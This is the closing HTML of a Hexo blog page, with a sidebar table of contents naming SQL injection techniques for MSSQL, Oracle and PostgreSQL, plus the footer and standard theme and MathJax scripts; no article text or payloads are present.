nav-level-1"><a class="nav-link" href="#mssql"><span class="nav-number"></span> <span class="nav-text">mssql</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#报错注入"><span class="nav-number">1.</span> <span class="nav-text">报错注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#输出到文件，上传木马"><span class="nav-number">2.</span> <span class="nav-text">输出到文件，上传木马</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#hex编码绕过waf"><span class="nav-number">3.</span> <span class="nav-text">hex编码绕过waf</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#boolean盲注"><span class="nav-number">4.</span> <span class="nav-text">boolean盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnslog注入-1"><span class="nav-number">5.</span> <span class="nav-text">dnslog注入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Oracle"><span class="nav-number"></span> <span class="nav-text">Oracle</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#dnslog注入-2"><span class="nav-number">1.</span> <span class="nav-text">dnslog注入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Postgresql"><span class="nav-number"></span> <span class="nav-text">Postgresql</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#dnslog注入-3"><span class="nav-number">1.</span> <span class="nav-text">dnslog注入</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">UltramanGaia</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({"tex2jax":{"inlineMath":[["$","$"],["\\(","\\)"]],"skipTags":["script","noscript","style","textarea","pre","code"],"processEscapes":true},"TeX":{"equationNumbers":{"autoNumber":"AMS"}}});
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
